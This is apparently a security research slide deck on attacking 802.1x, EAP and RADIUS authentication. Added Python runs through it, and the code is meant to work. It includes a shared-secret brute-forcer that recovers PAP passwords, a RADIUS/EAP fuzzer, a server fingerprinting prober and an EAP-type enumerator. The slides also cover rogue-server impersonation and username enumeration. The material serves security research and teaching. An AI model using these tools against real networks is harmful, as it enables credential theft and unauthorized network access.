
802.1x and BEYOND!
Brad Antoniewicz
www.foundstone.com
Copyright 2014
McAfee, Inc.
2
Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
Hi, I'm @brad_anton


Agenda
About 802.1x

Attacks

Fuzzing/Tools

IEEE 802.1x
Port-Based network access control
Cause not everyone is welcome at church?
Flow (IEEE 802.1x): Supplicant <-> Authenticator <-> Authentication Server
802.11: Wireless Client (supplicant) <-> Access Point (authenticator) <-> RADIUS Server (authentication server)
Ethernet: Wired Client (supplicant) <-> Network Switch (authenticator) <-> RADIUS Server (authentication server)
TRUSTED UNTRUSTED
What if I.
Cisco ACS 4.2

EAP
Extensible Authentication Protocol
RFC3748
EAP over 802.1x (EAPOL), Layer 2
EAP Type: PEAP, EAP-TTLS, EAP-FAST, etc. (Layer 2)
EAP over RADIUS (EAP-Message attribute)

RADIUS (Layer 3)
RADIUS
Remote Authentication Dial-In User Service
Origins: DSL/Dialup, VPN
RFC 2865 / RFC 2869
Integration
User Database
Active Directory
SecurID
LDAP

Surface
Surface
External Auth Handler
RADIUS/EAP/Types
802.1x/EAP/Types
(Protocol/Configuration/Handling issues)
Surface
Mgmt Web UI (one on each component)
Attacks
Sniffing (Protocol Issue)
Offline brute-force:
  Shared secret / User-Password: john
  CHAP: hashcat
  EAP data: asleap, eapmd5pass
Clear-text data:
  User-Name AVP / EAP Identity
  NAS-Identifier (NAS-Id)
  Calling-Station-Id
  State
No need to be fancy, just use Wireshark.
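The offline brute-force above, as an added example in Python (this is not code from the deck, nor from john, asleap or eapmd5pass; it re-implements the RFC 2865 arithmetic those tools exploit): with one captured Access-Request and its Access-Accept, recompute the Response Authenticator under each candidate secret until it matches, then unhide the PAP User-Password with the recovered secret. The packets, secret, Request Authenticator and wordlist below are constructed inline, not captured.

```python
import hashlib
import struct

# RADIUS codes and attribute types used below (RFC 2865)
ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_REPLY_MESSAGE = 1, 2, 18


def attr(atype, value):
    """One RADIUS attribute: Type, Length (covers the 2-byte header), Value."""
    return bytes([atype, len(value) + 2]) + value


def build_packet(code, ident, authenticator, attrs):
    """RADIUS header (Code, Identifier, Length, 16-byte Authenticator) followed by attributes."""
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def find_attr(pkt, wanted):
    """Value of the first attribute of the given type, or None; stops at a malformed attribute."""
    i = 20
    while i + 2 <= len(pkt):
        atype, alen = pkt[i], pkt[i + 1]
        if alen < 2 or i + alen > len(pkt):
            break
        if atype == wanted:
            return pkt[i + 2:i + alen]
        i += alen
    return None


def response_authenticator(code, ident, attrs, request_authenticator, secret):
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret).
    Everything but the secret is on the wire, which is what makes the offline attack possible."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_authenticator + attrs + secret).digest()


def crypt_user_password(data, request_authenticator, secret, decrypt):
    """RFC 2865 section 5.2 User-Password hiding: each 16-byte block is XORed with
    MD5(secret + previous ciphertext block); the first block uses the Request Authenticator."""
    if not decrypt:
        data = data + b"\x00" * (-len(data) % 16)  # pad the clear-text password
    out, prev = b"", request_authenticator
    for i in range(0, len(data), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(a ^ b for a, b in zip(data[i:i + 16], key))
        out += block
        prev = data[i:i + 16] if decrypt else block  # chaining always uses the ciphertext block
    return out.rstrip(b"\x00") if decrypt else out


def bruteforce_secret(request, response, wordlist):
    """Offline brute-force of the shared secret from one captured request/response pair."""
    request_authenticator = request[4:20]
    code, ident, resp_auth, attrs = response[0], response[1], response[4:20], response[20:]
    for candidate in wordlist:
        if response_authenticator(code, ident, attrs, request_authenticator, candidate) == resp_auth:
            return candidate
    return None


def recover_credentials(request, response, wordlist):
    """Secret first, then the PAP password hidden in the request's User-Password attribute."""
    secret = bruteforce_secret(request, response, wordlist)
    if secret is None:
        return None
    hidden = find_attr(request, ATTR_USER_PASSWORD)
    password = crypt_user_password(hidden, request[4:20], secret, decrypt=True) if hidden else None
    return secret, password


# --- Constructed sample exchange (not a real capture): a PAP Access-Request and its Access-Accept ---
SECRET = b"testing123"
REQUEST_AUTHENTICATOR = bytes(range(16))  # stands in for the NAS's 16 random bytes
REQUEST = build_packet(
    ACCESS_REQUEST, 7, REQUEST_AUTHENTICATOR,
    attr(ATTR_USER_NAME, b"bob")
    + attr(ATTR_USER_PASSWORD, crypt_user_password(b"hunter2", REQUEST_AUTHENTICATOR, SECRET, decrypt=False)),
)
ACCEPT_ATTRS = attr(ATTR_REPLY_MESSAGE, b"Welcome")
ACCEPT = build_packet(
    ACCESS_ACCEPT, 7,
    response_authenticator(ACCESS_ACCEPT, 7, ACCEPT_ATTRS, REQUEST_AUTHENTICATOR, SECRET),
    ACCEPT_ATTRS,
)
WORDLIST = [b"secret", b"radius", b"testing123", b"password"]

if __name__ == "__main__":
    print(recover_credentials(REQUEST, ACCEPT, WORDLIST))  # (b'testing123', b'hunter2')
```

A single request/reply pair is enough because the hash covers everything on the wire plus the secret; a Message-Authenticator attribute (HMAC-MD5 over the request) gives the same oracle from the request alone. The Request Authenticator is the NAS's random value and is in the capture, so the wordlist, not the traffic, is the limiting factor.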
Impersonation (Configuration Issue): attacker-controlled Authenticator and Authentication Server
FreeRADIUS-WPE (Configuration Issue)
hostapd-wpe (Configuration Issue)
https://github.com/OpenSecurityResearch/hostapd-wpe
Supports tons of EAP types (including EAP-FAST Phase 0)
Always returns EAP-Success
Requests PAP first
Responds to all 802.11 probe requests
Heartbleed (Cupid)
Saves to file / outputs NETNTLM format

Thanks to JoMo-Kun, @lgrangeia, and @haxorthematrix for patches, functionality and improvement suggestions

Fuzzing RADIUS/EAP/802.1x
Peach Overview
DataModel (what the data looks like)
StateModel (the message flow)
Publisher (the I/O channel to the Targets)
Agents (monitor the Targets for faults)
Transformers, mutators, etc.
DataModels
EAP: Eap.xml, EapFast.xml, EapGtc.xml, EapLeap.xml, EapMd5.xml, EapMschapv2.xml, EapPeap.xml, EapTls.xml, EapTlv.xml
RADIUS: Radius.xml
Supporting protocols: Tls.xml, Mschapv2.xml
Utilities: Utils.xml
802.1x: Ieee802.1x.xml
DataModel: Radius.xml
Per target, a StateModel, Tests and a VS DataModel:
  Cisco ACS
  TekRADIUS
  MS NPS/IAS
  SBR/FreeRadius
Fuzzers: UDPPublisher
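What the Radius.xml DataModel, the per-target StateModel and the UDPPublisher above amount to, as an added example written in Python instead of a Peach pit (this is not the deck's Peach code and uses no Peach API): a valid Access-Request carrying EAP-Response/Identity is the consistent instance of the model, each fuzz case breaks one of the length relations Peach normally keeps fixed up, validate() lists the checks RFC 2865 and RFC 3748 require before any field is trusted (so every case is one a careful server discards and a careless one parses), and udp_publish() plays the publisher with a liveness probe standing in for an Agent. The secret, identity and Request Authenticator are constructed; host, port and secret passed to udp_publish() are placeholders, and the target has to have the sending address configured as a RADIUS client for the probe to be answered.

```python
import hashlib
import hmac
import socket
import struct

ACCESS_REQUEST, RADIUS_MAX_LENGTH = 1, 4096  # RFC 2865 section 3
ATTR_USER_NAME, ATTR_EAP_MESSAGE, ATTR_MESSAGE_AUTHENTICATOR = 1, 79, 80
EAP_RESPONSE, EAP_TYPE_IDENTITY = 2, 1


def attr(atype, value):
    return bytes([atype, len(value) + 2]) + value


def eap_packet(code, ident, etype, data):
    """EAP header (RFC 3748): Code, Identifier, Length (includes the header), Type, Type-Data."""
    return struct.pack("!BBHB", code, ident, 5 + len(data), etype) + data


def radius_packet(code, ident, authenticator, attrs):
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def attr_offsets(pkt):
    """(offset, type, length) of each well-formed attribute; stops at the first bad one."""
    out, i = [], 20
    while i + 2 <= len(pkt) and pkt[i + 1] >= 2 and i + pkt[i + 1] <= len(pkt):
        out.append((i, pkt[i], pkt[i + 1]))
        i += pkt[i + 1]
    return out


def sign(pkt, secret):
    """RFC 3579 3.2: Message-Authenticator = HMAC-MD5(secret, packet with that attribute zeroed).
    Re-signed after every mutation so the HMAC check is not what decides a case; if the mutation
    hides the attribute from the walk, the case goes out unsigned (which is itself a case)."""
    for off, atype, alen in attr_offsets(pkt):
        if atype == ATTR_MESSAGE_AUTHENTICATOR and alen == 18:
            zeroed = pkt[:off + 2] + b"\x00" * 16 + pkt[off + 18:]
            return pkt[:off + 2] + hmac.new(secret, zeroed, hashlib.md5).digest() + pkt[off + 18:]
    return pkt


def base_request(ident, secret, identity=b"bob"):
    """A valid Access-Request carrying EAP-Response/Identity: the DataModel's consistent instance."""
    eap = eap_packet(EAP_RESPONSE, ident, EAP_TYPE_IDENTITY, identity)
    attrs = (attr(ATTR_USER_NAME, identity) + attr(ATTR_EAP_MESSAGE, eap)
             + attr(ATTR_MESSAGE_AUTHENTICATOR, b"\x00" * 16))
    # fixed Request Authenticator keeps cases reproducible; a real client uses 16 random bytes
    return sign(radius_packet(ACCESS_REQUEST, ident, b"\x11" * 16, attrs), secret)


def mutate(pkt, secret):
    """Yield (name, packet): every case breaks one length relation the DataModel normally keeps consistent."""
    offs = {atype: (off, alen) for off, atype, alen in attr_offsets(pkt)}
    un, (em, em_len) = offs[ATTR_USER_NAME][0], offs[ATTR_EAP_MESSAGE]
    cases = {
        "attr_len_zero": pkt[:un + 1] + b"\x00" + pkt[un + 2:],      # a walk doing i += len never advances
        "attr_len_overrun": pkt[:un + 1] + b"\xff" + pkt[un + 2:],   # value claims bytes past the datagram
        "eap_len_lie": pkt[:em + 4] + b"\xff\xff" + pkt[em + 6:],    # EAP Length larger than the EAP-Message
        "hdr_len_short": pkt[:2] + struct.pack("!H", 19) + pkt[4:],  # Length below the 20-byte header
        "hdr_len_over": pkt[:2] + struct.pack("!H", len(pkt) + 100) + pkt[4:],  # Length past the datagram
        # EAP-Message fragments are concatenated by the server: stack enough to pass the 4096 maximum
        "oversize": radius_packet(pkt[0], pkt[1], pkt[4:20],
                                  pkt[20:] + pkt[em:em + em_len] * (RADIUS_MAX_LENGTH // em_len + 1)),
    }
    for name, mutated in cases.items():
        yield name, sign(mutated, secret)


def validate(pkt):
    """The checks RFC 2865 section 3 and RFC 3748 section 4.1 require before any field is trusted;
    returns the first violation, or None for a packet a careful server would go on to parse."""
    if len(pkt) < 20:
        return "shorter than the RADIUS header"
    length = struct.unpack("!H", pkt[2:4])[0]
    if not 20 <= length <= RADIUS_MAX_LENGTH:
        return "header Length outside [20, 4096]"
    if length > len(pkt):
        return "header Length exceeds the datagram"
    i = 20
    while i < length:
        if i + 2 > length or pkt[i + 1] < 2:
            return "truncated attribute header or attribute Length < 2"
        if i + pkt[i + 1] > length:
            return "attribute overruns the packet"
        i += pkt[i + 1]
    eap = b"".join(pkt[o + 2:o + l] for o, t, l in attr_offsets(pkt[:length]) if t == ATTR_EAP_MESSAGE)
    if eap and (len(eap) < 4 or not 4 <= struct.unpack("!H", eap[2:4])[0] <= len(eap)):
        return "EAP Length inconsistent with the EAP-Message payload"
    return None


def udp_publish(host, port, cases, secret, timeout=2.0):
    """The UDPPublisher role: send a case, then a known-good request (Identifier 200) as a liveness
    probe. A target that stops answering is a finding to triage under a debugger, not yet a crash."""
    results = {}
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for name, pkt in cases:
            s.sendto(pkt, (host, port))
            s.sendto(base_request(200, secret), (host, port))
            try:
                while True:
                    reply = s.recvfrom(RADIUS_MAX_LENGTH)[0]
                    if len(reply) > 1 and reply[1] == 200:
                        break
                results[name] = "alive"
            except socket.timeout:
                results[name] = "no answer to the liveness probe"
    return results
```

Run it as `udp_publish("192.0.2.10", 1812, list(mutate(base_request(1, secret), secret)), secret)` against a lab server; the liveness probe is deliberately a fresh, correctly signed request so that a missing reply means the target, not the HMAC check, is the reason for silence.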

Publishers (all via wired, supports all tunneled EAP types)
RadiusPublisher (Eap.xml)
RadiusPeapPublisher (Eap.xml, inside TLS)
EthernetPeapPublisher (Eap.xml, inside TLS)
RawEthernetPublisher (Ieee8021x.xml)
Surface
Mgmt Web UI (one on each component; fuzz its string inputs with an injection-payload mutator)
StringMutator.Data.cs:

namespace Peach.Core.Mutators
{
    public partial class StringMutator
    {
        // Payloads substituted for string fields in the model
        static readonly string[] values = new string[] {
            // LDAP Injection
            // XSS
            // SQL Injection
            // CMD Injection
            // etc.
        };
    }
}
RADIUS/802.1x/EAP
Tools
Existing: libeap, pyradius
Releasing: Radius.NET (forked), Eap.NET, OpenSSL.NET (...I know... ugh, .NET)
Libz
OpenSSL.NET (fork):
SslUdp SslClient = new SslUdp(false);
SslUdp SslSvr = new SslUdp(pub, priv, true);
SslSvr.Send(ePkt.RawData);

Eap.NET (new):
RadiusEapSession eClient = new RadiusEapSession(host, secret);
EthernetEapSession eSvr = new EthernetEapSession(dev, pub, priv);
EapPacket ePkt = new EapPacket(bytes);          // parse a received packet
EapPacket ePkt = new EapPacket(Code, Type, ID); // build one to send
ePkt.SetEapData(bytes);
Profiling (active or passive)
State AVP (RADIUS): maintains the state of the conversation
  Cisco ACS: acs/Number/Number
  MS NPS: 38 bytes
EAP-Response/Identity username:
  MS NPS: rejects if not a valid user
  Others: doesn't matter
Message-Authenticator (RADIUS), when invalid:
  Cisco ACS: ignores it
  Others: Access-Reject

RadiusEapProfiler.exe
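The two RADIUS-side profiling observations above, the shape of the State AVP and what the server does with a bad Message-Authenticator, as an added example (this is not RadiusEapProfiler.exe, whose code is not on the page): the classifier encodes only the observations on the slide, the sample Access-Challenge and Access-Reject packets are constructed here rather than captured, and send_probe() is the one network call. The bad-Message-Authenticator probe needs nothing but a reachable port; getting a real State back needs a correctly signed EAP Identity request, which means having the shared secret.

```python
import re
import socket
import struct

ACCESS_REQUEST, ACCESS_REJECT, ACCESS_CHALLENGE = 1, 3, 11
ATTR_USER_NAME, ATTR_STATE, ATTR_EAP_MESSAGE, ATTR_MESSAGE_AUTHENTICATOR = 1, 24, 79, 80


def attr(atype, value):
    return bytes([atype, len(value) + 2]) + value


def radius_packet(code, ident, authenticator, attrs):
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def parse_attrs(pkt):
    """{type: [value, ...]}; stops at the first malformed attribute instead of trusting it."""
    out, i = {}, 20
    while i + 2 <= len(pkt):
        atype, alen = pkt[i], pkt[i + 1]
        if alen < 2 or i + alen > len(pkt):
            break
        out.setdefault(atype, []).append(pkt[i + 2:i + alen])
        i += alen
    return out


def bad_message_authenticator_probe(ident, identity=b"probe"):
    """Access-Request with EAP-Response/Identity and a deliberately wrong Message-Authenticator.
    RFC 3579 says to discard it silently; the slide records Cisco ACS answering anyway."""
    eap_identity = struct.pack("!BBHB", 2, ident, 5 + len(identity), 1) + identity
    attrs = (attr(ATTR_USER_NAME, identity) + attr(ATTR_EAP_MESSAGE, eap_identity)
             + attr(ATTR_MESSAGE_AUTHENTICATOR, b"\xff" * 16))
    return radius_packet(ACCESS_REQUEST, ident, b"\x11" * 16, attrs)


def send_probe(host, port, pkt, timeout=2.0):
    """Send one packet; return the reply, or None on timeout (the 'silently discarded' outcome)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(pkt, (host, port))
        try:
            return s.recvfrom(4096)[0]
        except socket.timeout:
            return None


def fingerprint_state(state):
    """Classify by the shape of the State AVP, using only the observations on the slide."""
    if re.fullmatch(rb"acs/\d+/\d+", state):
        return "Cisco ACS"
    if len(state) == 38:
        return "MS NPS"
    return "unknown"


def profile(probe_reply, challenge):
    """probe_reply: reply (or None) to bad_message_authenticator_probe();
    challenge: Access-Challenge to a well-formed EAP Identity request. Returns (guess, findings)."""
    findings = []
    if probe_reply is None:
        findings.append("bad Message-Authenticator: silently discarded (RFC 3579 behaviour)")
    elif probe_reply[0] == ACCESS_CHALLENGE:
        findings.append("bad Message-Authenticator: ignored, conversation continues (Cisco ACS behaviour)")
    elif probe_reply[0] == ACCESS_REJECT:
        findings.append("bad Message-Authenticator: Access-Reject")
    else:
        findings.append("bad Message-Authenticator: unexpected code %d" % probe_reply[0])
    states = parse_attrs(challenge).get(ATTR_STATE, [])
    guess = fingerprint_state(states[0]) if states else "unknown"
    findings.append("State AVP: " + ("%d bytes, looks like %s" % (len(states[0]), guess) if states else "absent"))
    if guess == "unknown" and probe_reply is not None and probe_reply[0] == ACCESS_CHALLENGE:
        guess = "Cisco ACS"  # the Message-Authenticator observation alone points there
    return guess, findings


# --- Constructed samples (not captured): EAP-Request/PEAP-Start challenges from two server types ---
PEAP_START = bytes([1, 2, 0, 6, 25, 0x20])  # EAP-Request, id 2, length 6, type 25 (PEAP), S flag
ACS_CHALLENGE = radius_packet(ACCESS_CHALLENGE, 1, b"\x00" * 16,
                              attr(ATTR_EAP_MESSAGE, PEAP_START) + attr(ATTR_STATE, b"acs/12345678/42"))
NPS_CHALLENGE = radius_packet(ACCESS_CHALLENGE, 1, b"\x00" * 16,
                              attr(ATTR_EAP_MESSAGE, PEAP_START) + attr(ATTR_STATE, bytes(38)))
NPS_REJECT = radius_packet(ACCESS_REJECT, 1, b"\x00" * 16, b"")

if __name__ == "__main__":
    print(profile(ACS_CHALLENGE, ACS_CHALLENGE)[0])  # Cisco ACS
    print(profile(NPS_REJECT, NPS_CHALLENGE)[0])     # MS NPS
```

Against a live target the two inputs come from `send_probe(host, 1812, bad_message_authenticator_probe(1))` and from the challenge to a properly signed Identity request; a None from the first probe is the RFC-conformant answer and still narrows the field.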
Brute-Force (or enumeration, whatever)
Password: a.k.a. active brute force (..meh)
Usernames: NPS rejects an unknown user at EAP-Response/Identity, so it confirms valid names
EAP-Type: client downgrade

eapEnum.exe
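The EAP-type enumeration the eapEnum.exe line describes, as an added example with both sides of the exchange (this is not eapEnum.exe, whose code is not on the page, and the server is a constructed stand-in, not any real product): for each candidate type, start a fresh conversation with EAP-Response/Identity and answer the server's proposal with a legacy Nak naming that type; what the server proposes next tells you whether it supports it. On the wire these EAP packets ride inside RADIUS EAP-Message attributes or EAPOL frames, which is what eapol_test drives against a real server; the supplicant-side downgrade is the mirror image, a rogue server proposing the weakest type and watching whether the client accepts.

```python
import struct

EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPE_IDENTITY, EAP_TYPE_NAK = 1, 3
EAP_TYPE_NAMES = {4: "MD5-Challenge", 13: "EAP-TLS", 17: "LEAP", 21: "EAP-TTLS", 25: "PEAP", 43: "EAP-FAST"}


def eap_packet(code, ident, etype=None, data=b""):
    """EAP (RFC 3748): Code, Identifier, Length; Success and Failure carry no Type byte."""
    if etype is None:
        return struct.pack("!BBH", code, ident, 4)
    return struct.pack("!BBHB", code, ident, 5 + len(data), etype) + data


def eap_nak(ident, desired_types):
    """Legacy Nak (RFC 3748 5.3.1): 'not this type, one of these please'."""
    return eap_packet(EAP_RESPONSE, ident, EAP_TYPE_NAK, bytes(desired_types))


def offered_type(eap):
    """Type the server proposes in an EAP-Request, or None for Success/Failure/short packets."""
    if len(eap) >= 5 and eap[0] == EAP_REQUEST:
        return eap[4]
    return None


def enumerate_eap_types(respond, candidates, identity=b"probe"):
    """For each candidate, a fresh conversation: Identity, then a Nak for the candidate if the
    server proposed something else. `respond` takes our EAP-Response and returns the server's next packet."""
    supported = set()
    for want in candidates:
        first = respond(eap_packet(EAP_RESPONSE, 1, EAP_TYPE_IDENTITY, identity))
        got = offered_type(first)
        if got == want:
            supported.add(want)
            continue
        if got is None:
            continue  # server gave up before proposing anything
        if offered_type(respond(eap_nak(first[1], [want]))) == want:
            supported.add(want)
    return sorted(supported)


def fake_server(supported=(25, 13)):
    """Constructed stand-in for an authentication server (not any real product): proposes its
    preferred type first, honours a Nak for a type it supports, otherwise fails the conversation.
    Real servers add type-specific data (e.g. a PEAP Start flag) to the Request; omitted here."""
    def respond(eap_response):
        if len(eap_response) < 5 or eap_response[0] != EAP_RESPONSE:
            return eap_packet(EAP_FAILURE, eap_response[1] if len(eap_response) > 1 else 0)
        ident, length, etype = eap_response[1], struct.unpack("!H", eap_response[2:4])[0], eap_response[4]
        next_id = (ident + 1) & 0xFF
        if etype == EAP_TYPE_IDENTITY:
            return eap_packet(EAP_REQUEST, next_id, supported[0])
        if etype == EAP_TYPE_NAK:
            for want in eap_response[5:length]:
                if want in supported:
                    return eap_packet(EAP_REQUEST, next_id, want)
        return eap_packet(EAP_FAILURE, next_id)
    return respond


if __name__ == "__main__":
    found = enumerate_eap_types(fake_server(), sorted(EAP_TYPE_NAMES))
    print([EAP_TYPE_NAMES[t] for t in found])  # ['EAP-TLS', 'PEAP']
```

Each candidate gets its own conversation on purpose: a server that answers a Nak with EAP-Failure ends the session, and re-using it would make every later candidate look unsupported.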
TODO: wpa_supplicant-wpe (enumeration/profiles/exploits)
Notes for the researchers
Don't try to fuzz EAP over WiFi, through wpa_supplicant, or through an authenticator.
eapol_test is great (make eapol_test in wpa_supplicant).
netsh lan reconnect will start an 802.1x connection on Windows 7 and 8.1.
gflags +hpa +ust (page heap and user-mode stack traces) to find the real goodies.
Exploitation
&
?
@brad_anton

Brad.Antoniewicz@foundstone.com
*Many of the pics in this presentation were found on the internet; credit goes to images.google.com
